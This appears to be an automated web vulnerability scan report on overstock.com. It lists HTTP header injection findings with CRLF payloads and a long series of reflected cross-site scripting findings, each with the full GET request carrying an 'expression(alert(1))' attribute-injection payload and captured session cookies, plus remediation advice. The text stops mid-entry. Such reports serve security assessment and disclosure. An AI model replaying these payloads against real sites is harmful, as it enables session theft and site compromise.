HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the SearchType request parameter is copied into the Set-Cookie response header. The payload 38a98%0d%0a33897e1ca0a was submitted in the SearchType parameter. This caused a response containing an injected HTTP header.
The value of the keywords request parameter is copied into the Set-Cookie response header. The payload 6d6b5%0d%0ac2356b260d7 was submitted in the keywords parameter. This caused a response containing an injected HTTP header.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html> <!-- Copyright 2009 Overstock.com --> <!-- all rights reserved --> <!-- j40.overstock.com ssl:f ...[SNIP]...
1.3. http://www.overstock.com/search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.overstock.com
Path:
/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Set-Cookie response header. The payload ca02f%0d%0aa7c5d88fad3 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
The value of the taxonomy request parameter is copied into the Set-Cookie response header. The payload f7bc4%0d%0a1641d061be5 was submitted in the taxonomy parameter. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://www.overstock.com/Baby/Blossom-Flower-13-piece-Crib-Bedding-Set/5230750/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38bd5"style%3d"x%3aexpression(alert(1))"b9c237e34ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 38bd5"style="x:expression(alert(1))"b9c237e34ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Baby/Blossom-Flower-13-piece-Crib-Bedding-Set/5230750/product.html?38bd5"style%3d"x%3aexpression(alert(1))"b9c237e34ca=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.2. http://www.overstock.com/Baby/Cybex-Oynx-Lightweight-Stroller-in-Slate/5148023/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f6f"style%3d"x%3aexpression(alert(1))"31807ecf3d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68f6f"style="x:expression(alert(1))"31807ecf3d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Baby/Cybex-Oynx-Lightweight-Stroller-in-Slate/5148023/product.html?68f6f"style%3d"x%3aexpression(alert(1))"31807ecf3d6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.3. http://www.overstock.com/Baby/Eddie-Bauer-Rocking-Wood-Bassinet/5033926/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48c3e"style%3d"x%3aexpression(alert(1))"fb347059ff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48c3e"style="x:expression(alert(1))"fb347059ff4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Baby/Eddie-Bauer-Rocking-Wood-Bassinet/5033926/product.html?48c3e"style%3d"x%3aexpression(alert(1))"fb347059ff4=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.4. http://www.overstock.com/Baby/Fisher-Price-Zen-Collection-Cradle-Swing/5042811/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9101"style%3d"x%3aexpression(alert(1))"646300c3d51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9101"style="x:expression(alert(1))"646300c3d51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Baby/Fisher-Price-Zen-Collection-Cradle-Swing/5042811/product.html?b9101"style%3d"x%3aexpression(alert(1))"646300c3d51=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.5. http://www.overstock.com/Baby/Safety-1st-Alpha-Omega-Elite-Convertible-Car-Seat-in-Triton/3514162/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 197a6"style%3d"x%3aexpression(alert(1))"7f8de40b4e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 197a6"style="x:expression(alert(1))"7f8de40b4e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Baby/Safety-1st-Alpha-Omega-Elite-Convertible-Car-Seat-in-Triton/3514162/product.html?197a6"style%3d"x%3aexpression(alert(1))"7f8de40b4e8=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.6. http://www.overstock.com/Clothing-Shoes/Adi-Designs-Womens-Lug-Sole-Microsuede-Boots/4034996/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c86e7"style%3d"x%3aexpression(alert(1))"459158a778c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c86e7"style="x:expression(alert(1))"459158a778c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Adi-Designs-Womens-Lug-Sole-Microsuede-Boots/4034996/product.html?c86e7"style%3d"x%3aexpression(alert(1))"459158a778c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.7. http://www.overstock.com/Clothing-Shoes/Adi-Designs-Womens-Microsuede-Mid-calf-Boots/2691136/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a597d"style%3d"x%3aexpression(alert(1))"e7efc54d74e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a597d"style="x:expression(alert(1))"e7efc54d74e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Adi-Designs-Womens-Microsuede-Mid-calf-Boots/2691136/product.html?a597d"style%3d"x%3aexpression(alert(1))"e7efc54d74e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.8. http://www.overstock.com/Clothing-Shoes/Alta-Vison-Mens-Goldtone-Aviator-Sunglasses/5016847/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1be1a"style%3d"x%3aexpression(alert(1))"d9cf0caab8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1be1a"style="x:expression(alert(1))"d9cf0caab8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Alta-Vison-Mens-Goldtone-Aviator-Sunglasses/5016847/product.html?1be1a"style%3d"x%3aexpression(alert(1))"d9cf0caab8a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.9. http://www.overstock.com/Clothing-Shoes/America-Best-Womens-Fleece-Lined-Leather-Gloves/5301336/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e4d"style%3d"x%3aexpression(alert(1))"85f611973fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2e4d"style="x:expression(alert(1))"85f611973fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/America-Best-Womens-Fleece-Lined-Leather-Gloves/5301336/product.html?d2e4d"style%3d"x%3aexpression(alert(1))"85f611973fd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.10. http://www.overstock.com/Clothing-Shoes/Amerileather-Casual-Leather-Handbag/29943/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 688e1"style%3d"x%3aexpression(alert(1))"782a1c744b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 688e1"style="x:expression(alert(1))"782a1c744b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Amerileather-Casual-Leather-Handbag/29943/product.html?688e1"style%3d"x%3aexpression(alert(1))"782a1c744b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.11. http://www.overstock.com/Clothing-Shoes/Amerileather-Cosmopolitan-Leather-Tote-Bag/512067/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2260e"style%3d"x%3aexpression(alert(1))"96ee5398979 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2260e"style="x:expression(alert(1))"96ee5398979 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Amerileather-Cosmopolitan-Leather-Tote-Bag/512067/product.html?2260e"style%3d"x%3aexpression(alert(1))"96ee5398979=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.12. http://www.overstock.com/Clothing-Shoes/Amerileather-Double-Handle-Tote/3025022/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7efa"style%3d"x%3aexpression(alert(1))"dd0f4e2dd35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7efa"style="x:expression(alert(1))"dd0f4e2dd35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Amerileather-Double-Handle-Tote/3025022/product.html?b7efa"style%3d"x%3aexpression(alert(1))"dd0f4e2dd35=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.13. http://www.overstock.com/Clothing-Shoes/Amerileather-Kylie-Leather-Handbag/5045672/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18c8b"style%3d"x%3aexpression(alert(1))"366dab40ca2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 18c8b"style="x:expression(alert(1))"366dab40ca2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
